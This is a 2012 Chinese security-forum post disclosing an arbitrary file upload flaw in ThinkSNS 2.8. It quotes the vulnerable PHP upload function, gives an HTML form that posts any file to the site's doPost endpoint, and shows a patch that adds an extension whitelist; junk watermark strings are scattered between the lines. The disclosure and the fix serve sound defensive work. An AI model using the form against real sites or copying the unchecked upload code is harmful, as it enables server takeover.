中国网络渗透测试联盟
标题:
ThinkSNS 2.8任意文件上传漏洞及修复
[打印本页]
作者:
admin
时间:
2012-12-4 11:12
标题:
ThinkSNS 2.8任意文件上传漏洞及修复
微博上传图片时只在前端进行验证, 服务器端没有进行安全过滤。
8 y$ C" {5 v" b* B% I
1 T# A0 x- p7 G" f( _2 Q
) j I6 _# t/ O7 l
\api\StatusesApi.class.php
! C& `2 V k% l/ j1 r4 z4 ]. W
$ C6 d. t$ E- y& r/ z* ]
function uploadpic(){
( \( R4 S/ L( V
if( $_FILES['pic'] ){
2 f7 v6 E% g# K; i6 Y0 G' M0 n
//执行上传操作
/ {: G- i3 _2 v4 U% o9 g
$savePath = $this->_getSaveTempPath();
5 w% L: T/ o0 S/ y$ z2 O
$filename = md5( time().'teste' ).'.'.substr($_FILES['pic']['name'],strpos($_FILES['pic']['name'],'.')+1);
I5 V s# g8 q2 q
if(@copy($_FILES['pic']['tmp_name'], $savePath.'/'.$filename) || @move_uploaded_file($_FILES['pic']['tmp_name'], $savePath.'/'.$filename))
. Z+ J, I9 A2 t) E8 d/ k
{
`: t }* Y6 W8 @, G/ }
$result['boolen'] = 1;
8 W: F5 w. |5 L, a" p6 d
$result['type_data'] = 'temp/'.$filename;
* N @/ t+ n8 F! h$ Y# m
$result['picurl'] = SITE_PATH.'/uploads/temp/'.$filename;
- b3 d' _/ T/ e B$ g& ]/ V: I% K
} else {
% q. ~( X* U; p- k1 c3 v0 v0 d* U0 L
$result['boolen'] = 0;
( @* W* W0 M+ V
$result['message'] = '上传失败';
6 I0 {. C! [8 A
}
! w- Y3 V+ r3 e8 g; h. j
}else{
?) E: Q( f, _7 i- s$ t" T2 e
$result['boolen'] = 0;
# P/ ]0 [+ J1 o
$result['message'] = '上传失败';
. x. t, w2 H9 |9 F5 X* i+ W+ ?( L& W
}
) T! c; ] r1 s; y1 p$ T
return $result;
0 x& p* W; O& a f2 L: P) Z
}
/ [0 T' f4 a, U! K- w3 I
unloadpic()方法没有对文件类型进行验证
0 Z* O" c- b7 Y& ^0 `! B' ?
/ U6 N b& v" F. f4 e8 B8 ?
可以构建表单, 选择任意文件, 提交到
! e% v1 _+ f' Z% o
/index.php?app=w3g&mod=Index&act=doPost
% J* i% l2 D; |0 G3 [. S
1 z( w* P( U0 a! x
在新提交的微博上可以找到上传的文件地址(去掉small_、middle_ 前缀)
. ~" i) v% Q$ e: P' k R% m+ u& ]
% K" o: t' [2 C( F, M l+ D
k$ a3 m Y9 b! m0 L
在登录thinksns官方微博后,
8 `* V5 L7 l. m; V4 v) y* h" t
构建以下表单:
1 G% \/ @* V+ q$ u1 \
. j V3 O7 J0 Y9 s
<form action="http://t.thinksns.com/index.php?app=w3g&mod=Index&act=doPost" method="post" enctype="multipart/form-data" />
2 }" M2 ^' C8 u9 U5 \- R( Y6 j
<textarea name="content">test</textarea>
2 s- M2 k8 ]$ m! ?8 f8 t, W
file: <input id="file" type="file" name="pic" />
% q. `! e& e" a9 V" S+ N
<input type="submit" value="Post" />
) n( C; P- Z, d }& q Z" T
</form>
4 }+ F; ^+ s6 P. v0 o$ {5 B
去掉缩略图的前缀(small_ )
9 O; V# w& w& m& V% H
修复方案:
, H& K$ g/ e: \0 W& x2 k: v+ Q( _
* ~, h- _7 Z+ j
$ M* e; U# r8 [5 {) \3 w" G
\api\StatusesApi.class.php
" [: h3 p! e1 H1 }
1 t% ?0 Q" Z: Z- O O/ J+ A# S
function uploadpic(){
0 {; ?, [3 K; d; Y
/**
& b% S( E+ O. p# O9 ~* L5 i! D0 ^
* 20121018 @yelo
* `$ N, }7 t( F- R8 Q0 w! j2 Z& ~
* 增加上传类型验证
3 @' t. L: k4 x
*/
- D; ?2 |6 [, Z! z7 C7 ]% L
$pathinfo = pathinfo($_FILES['pic']['name']);
! q" b2 H u$ S; [- w
$ext = $pathinfo['extension'];
+ x5 J) q$ [+ b) i4 R7 Z3 R
$allowExts = array('jpg', 'png', 'gif', 'jpeg');
5 f: C, w& \) ~, A! u, |
- g5 `; N. S0 z4 l) C, h
$uploadCondition = $_FILES['pic'] && in_array(strtolower($ext),$allowExts,true);
x+ t8 n0 V) ~( S9 X/ S/ }# x0 p
. ?# J) Q+ e% Q, O R/ g
if( $uploadCondition ){
7 ]$ h4 d W- B9 U
//执行上传操作
% I- N8 R5 H1 S# u, ?+ L# i& h/ Q
$savePath = $this->_getSaveTempPath();
) @1 N. S& g$ m8 V& z8 \
$filename = md5( time().'teste' ).'.'.substr($_FILES['pic']['name'],strpos($_FILES['pic']['name'],'.')+1);
8 q4 f5 n& Y3 M3 }
if(@copy($_FILES['pic']['tmp_name'], $savePath.'/'.$filename) || @move_uploaded_file($_FILES['pic']['tmp_name'], $savePath.'/'.$filename))
% I* A6 l3 ~. f& f" M
{
# h4 l' O1 @+ A: i6 Y& w
$result['boolen'] = 1;
! \# I0 J8 |/ c$ Z% p; T# V7 J
$result['type_data'] = 'temp/'.$filename;
, h8 E" W3 [( E0 m, S
$result['picurl'] = SITE_PATH.'/uploads/temp/'.$filename;
7 L& y' K# c; ^) ]- l
} else {
z" q+ l3 Y3 |; f9 D
$result['boolen'] = 0;
# ?8 v7 o4 S6 @1 v
$result['message'] = '上传失败';
# a9 M, t7 r4 W+ z
}
5 o" ], z8 A* K, c% U/ D
}else{
1 X, k6 J& x2 A2 ?2 N* J
$result['boolen'] = 0;
& Y+ |: g' ?# W& Z2 d: E3 D
$result['message'] = '上传失败';
8 ?" E0 U+ D( }+ `7 {
}
c, j& r: Y( R3 L5 S4 ^
return $result;
P5 @+ B8 {8 [
}
5 _9 |/ X! S$ B6 m
. r8 h4 v$ g! [. U4 n- S
7 m( v; K7 R! O2 d( M7 ]
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2